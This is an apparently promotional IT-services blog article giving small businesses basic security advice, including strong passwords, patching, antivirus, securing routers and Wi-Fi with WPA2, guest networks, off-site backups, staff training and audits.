With the business value of our networks, applications and data continually increasing, network security is an area that most business correctly identify as a priority. According to a PWC 2014 Information Security Breaches Survey, 60% of small businesses had a security breach in the last year with an average cost of £65k-£115k to the business for its worst security breach of the year. Securing your systems can seem like a daunting task, but it needn’t be. Follow these simple steps to make your business computer systems more secure.
Enforce a strong password policy
We all know that we should use strong passwords should be used to prevent anauthorised access to our computer system. Yet, there are still a surprising number of businesses that do not enforce this policy. Passwords such as “password” or the name of the business are still incredibly common on business networks.
Most computers and network operating systems provide policy modules that can enforce password length, complexity, history and expiration and you should ensure that these policies are properly set. If your business uses a Microsoft Windows domain then get your domain administrator to set the policies for you at the domain level; if you do not have a domain then set the password policy on each computer individually.
Automatic sign-in is almost as bad as having no password at all, even if a strong password policy is set, so disable it wherever possible. This is especially true of devices, such as laptop computers, that are taken off-site and may be lost or stolen. If you have a computer that requires automatic sign-in then ensure that the computer is properly security hardened to ensure that the automatically signed in user is unable to do any damage. Get expert advice if necessary.
Restrict the use of generic accounts
Generic accounts are computing accounts set up for a specific purpose that can be accessed by multiple people. Generic accounts are inherently less security than named accounts because multiple people know the logon credentials, passwords are often set to something that is simple and are rarely changed in order to make them easier for everyone to remember.
Wherever possible, assign separated, named credentials to each use so that they, and only they, are able to access your systems using that account. Where the use of generic accounts is unavoidable, ensure that the accounts have the bare minimum access rights to perform their function and ensure that a strong password policy is set. Restrict the number of people that know the account credentials to those that require use of it and make them aware of the risks and consequences of the credentials falling into the wrong hands.
Update your operating systems and software regularly
Most attackers don’t have the skill to find new security vulnerabilities in your software. For them it is much easier to wait for the vendor to release a patch and then reverse engineer it to find identify the vulnerability it fixes and work out how to exploit it. For this reason, known vulnerabilities are a much greater threat than new ones and you should ensure that all your systems are regularly updates with security patches to protect against them.
Almost all operating system and many software vendors provide automatic update functionality. All you need to do is ensure that it is properly configured and occasionally check to ensure that it is working as expected. Configure automatic updates wherever possible but beware when updating business critical systems because some updates may change the functionality of the software with unexpected results. If in doubt, get expert IT support advice.
Keep your anti-virus up-to-date
Internet threats continuously evolve and cybercriminals are always looking for new forms of attack, and new ways of accessing your systems. And yet, many businesses, especially smaller ones, are surprisingly lacks in keeping their anti-virus products up-to-date. In 2014, 45% of small businesses survey by PWC suffered from infection from viruses or malicious software. Updates can protect you from new threats that are developed each day and increase your overall Internet security.
When you first install your software it protects you against threats known at that point in time. After that, you receive updates via the Internet, so that you can get them in a timely manner. If you are not regularly updating your security software, you are leaving yourself open to all the threats that have evolved since your last update or initial installation.
Secure your network devices
Many routers, switched and wireless access points come configured with standard and published default administrative credentials. If any intruder were able to establish the manufacturer of your device, the first thing they are will try is the default username and password so ensure that each of your network devices has a non-default, strong password set.
For devices that have an internet interface, such as internet routers, ensure that no administrative ports are open on the internet interface. Administrative ports should only be open on the internal interface of the device. Remember that an internet router with an open external administrative port and default administrative credentials is an open door into your network.
Secure your wireless network
The first thing an intruder needs to get in to your computer systems is access to your network. With the proliferation of business Wi-Fi networks this has become a lot easier – they don’t even need to gain physical access to your premises any more, they can simply park up out front or sit in the coffee shop next door.
Protect your Wi-Fi network against unauthorised intrusion by securing it with encryption. WEP (Wired Equivalent Privacy) is an outdated and very week security algorithm and should be avoided; use WPA (Wi-Fi Protection Access) instead.
WPA comes in two flavours: standard WPA, which is vastly superior to WEP but still vulnerable to intrusion when short or dictionary-based passphrases are used; and the more advanced WPA2 which used AES encryption, which is far stronger than the TKIP method usually used in WPA. Unfortunately, some devices may not support WPA2 and WPA2 uses more computational power than WPA, so it could degrade the speed of your wireless network when used with older access points and/or PCs.
Use WPA2 with AES encryption wherever possible. If forced to use WPA, ensure that a long, strong passphrase is used. Do not use WEP under any circumstance.
Only allow trusted devices on your network.
It is a simple matter for a computer that has access to your network to perform a scan on other devices on the network, looking for security vulnerabilities and unsecured assets; or introduce malicious software, perhaps unintentional, to your network. Make it company policy that only authorised and trusted devices that you have control of may connect to your business network.
It has become common practice for staff to bring their own devices (mobile phones, tablets etc) to work and connect to the work network. You may also wish to allow clients, customers and business partners to connect too. If this is the case, then configure a DMZ (demilitarized zone) for these devices to connect to. A DMZ is a network segment that is isolated from the rest of your business network. Devices connected to the DMZ will not be able to access any of your internal IT systems but will be able to access the internet as usual.
Most modern firewalls and internet routers have DMZ functionality built in – all that is needed is for you to conjure one of the LAN ports as the DMZ and then connect you DMZ network to that port. For an even simpler solution, some wireless access routers (e.g. TP-Link W8960N) come with a configurable ‘guest’ Wi-Fi network which is separate from your main Wi-Fi network and isolates the guest Wi-Fi traffic from it.
Carry out regular off-site backups
Security concerns are often focussed on preventing access to your systems, however, you should give equal consideration to recovering lost data and systems operations. It is not only malicious intrusion that you need to protect you systems against, but incidental loss and system hardware failure too.
Backup and recovery strategy is a separate topic in itself and, depending of the operational nature of your business and value and sensitivity of your data, solutions can range from simple and inexpensive to very expensive and complexed. For the small business, you should, at the very least, carry out regular backups of your critical business data to be stored off-site. Fortunately, with ever increasing internet bandwidth and ever cheaper online storage costs, cloud-based online backups have become a viable option for even the smallest of businesses. A simple internet search will throw up a host of online backup service providers.
Raise IT awareness amongst your staff
Computer security is usually perceived as a technical challenge. In reality, one of the biggest threats to your IT systems is the human factor. Your staff uses your computer systems every day to carry out their work and yet many have no formal IT training and no real understanding of the security implications of their actions. Read through this article again and think about it, you should soon realise that many of the security measures described here could be negated by human error.
Raise IT awareness amongst your staff – make them aware of why it is important not to share their logon credentials or wireless passphrases with others, where to store data so that it will be securely backed up; which data is confidential and/or sensitive, how to respond to and report suspicious behaviour etc.
Ideally, you would send all your business IT users with formal security training, but if that is cost prohibitive then, at least, get a qualified member of staff to provide essential computer training. Send out occasional security hints and tips to educate users and keep security at the front of their minds – event a link to this article will provide quite a lot of useful information that most normal users would be aware of.
Commission a security audit
Computer and IT security is a vast topic and much too expensive to cover in its entirety here. If security is a genuine concern for your business then it is worth spending a little money to get a comprehensive 3rd party audit over your entire network to check for potential security holes and vulnerabilities.
Contact us to find out more.